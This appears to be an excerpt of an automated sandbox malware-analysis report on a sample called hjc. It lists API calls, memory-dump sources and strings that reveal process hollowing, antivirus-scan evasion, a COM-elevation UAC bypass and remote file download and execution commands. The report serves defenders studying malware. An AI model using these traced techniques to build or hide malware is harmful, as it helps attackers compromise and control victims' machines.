                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,03231FE4), ref: 03231704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BA8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BC0
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BD2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BE4
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BF6
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD), ref: 03249C08
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B), ref: 03249C1A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 03249C2C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 03249C3E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 03249C50
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 03249C62
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 03249C74
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 03249C86
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 03249C98
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 03249CAA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 03249CBC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 03249CCE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-597814768
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 03248446
                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,032953DC), ref: 032487DF
                                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B0,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03248A3C
                                                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B0,00000004,032954B8), ref: 03248BB7
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,ScanBuffer,03295360), ref: 0324920B
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B4,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,00000000), ref: 0324937E
                                                                                                                                                                                    • SetThreadContext.KERNEL32(00000000,032953DC), ref: 032494F4
                                                                                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B4,00000004,032954B8), ref: 03249501
                                                                                                                                                                                      • Part of subcall function 03247AC0: LoadLibraryW.KERNEL32(bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString,03295360,03249A30), ref: 03247AD2
                                                                                                                                                                                      • Part of subcall function 03247AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString), ref: 03247ADF
                                                                                                                                                                                      • Part of subcall function 03247AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03247AF6
                                                                                                                                                                                      • Part of subcall function 03247AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30), ref: 03247B05
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                    • API String ID: 2533507481-2367850715
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 03248446
                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,032953DC), ref: 032487DF
                                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B0,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03248A3C
                                                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B0,00000004,032954B8), ref: 03248BB7
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                    • API String ID: 3979268988-2367850715
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15CA7CB9
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 15CA7D87
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15CA7DA9
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC2EC
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC31C
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC371
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D2
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D9
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: WaitForSingleObject.KERNEL32(?,00000000,15CA1A45,?,?,00000004,?,?,00000004,15D16B50,15D14EE0,00000000), ref: 15CA4B47
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,15D16B50,15D14EE0,00000000,?,?,?,?,?,15CA1A45), ref: 15CA4B75
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15CA8197
                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32 ref: 15CA8278
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 15CA84C4
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 15CA8652
                                                                                                                                                                                      • Part of subcall function 15CA880C: __EH_prolog.LIBCMT ref: 15CA8811
                                                                                                                                                                                      • Part of subcall function 15CA880C: FindFirstFileW.KERNEL32(00000000,?,15D06608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88CA
                                                                                                                                                                                      • Part of subcall function 15CA880C: __CxxThrowException@8.LIBVCRUNTIME ref: 15CA88F2
                                                                                                                                                                                      • Part of subcall function 15CA880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88FF
                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 15CA86F8
                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000), ref: 15CA873A
                                                                                                                                                                                      • Part of subcall function 15CBC9E2: SystemParametersInfoW.USER32 ref: 15CBCAD7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                                                                                    • API String ID: 1067849700-1507758755
                                                                                                                                                                                    • Opcode ID: 28cc035891f4dd2ff21f0ca49783016a6296cac8e44d9fc89aa061ac261e4a1a
                                                                                                                                                                                    • Instruction ID: d7b171eb7cb89bcd1f4ca457cf4bda772a834d9bf4d69b07dd190a983809af8f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cc035891f4dd2ff21f0ca49783016a6296cac8e44d9fc89aa061ac261e4a1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6426E7BB082526BCB14EF74CDA59AF7FA5AF91280F800D1CE54257190FF25BA08C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,03237338,03230000,0325B790), ref: 032358E9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,03237338,03230000,0325B790), ref: 03235900
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 03235930
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 03235994
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359CA
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359DD
                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359EF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359FB
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338,03230000), ref: 03235A2F
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03237338), ref: 03235A3B
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 03235A5D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                                    • Opcode ID: e6bdb68efcb43aa327428b318a3c5955d8c69c353e8eb756918527a34a207fa1
                                                                                                                                                                                    • Instruction ID: 6bbaca881b7583aab9af4af92a7179558f570bfb1f329924825a30c3fb66ae4a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6bdb68efcb43aa327428b318a3c5955d8c69c353e8eb756918527a34a207fa1
                                                                                                                                                                                    • Instruction Fuzzy Hash: A14154B2D10619AFDB10EAE8CC88ADEB7FCAF0B250F1845A5A549D7240D7B4DF808B54
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 15CA7521
                                                                                                                                                                                    • CoGetObject.OLE32(?,00000024,15D06518,00000000), ref: 15CA7582
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                                                    • Opcode ID: 11a60d62343ac931aab4da1b898874b747fdc06c6ea5741139f1ca805cca3259
                                                                                                                                                                                    • Instruction ID: 1e3fa12d925dc0396cc55d90185b97b33d847ed7091030d6951c4b1959be85b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11a60d62343ac931aab4da1b898874b747fdc06c6ea5741139f1ca805cca3259
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5113377910219AADB10DED48C489DEBBFCFB04710F140556E509A7240FA34AA45C7F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03235BAC
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235BB9
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03235BBF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03235BEA
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C31
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C41
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C69
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C79
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03235C9F
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03235CAF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                                                                                                    • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                                    • Instruction ID: bfc0e86dddbe20d26e615fb8dcf627c0569d31b57df5e88e3b19aca86861d3c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631A7F1E5022D2AFF25D6B4DC45FDEB7AD4B06384F0405E19648E7185D6B4AEC88B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC2EC
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC31C
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,15D14EE0,?), ref: 15CBC38E
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC39B
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC371
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,15D14EE0,?), ref: 15CBC3BC
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D2
                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D9
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
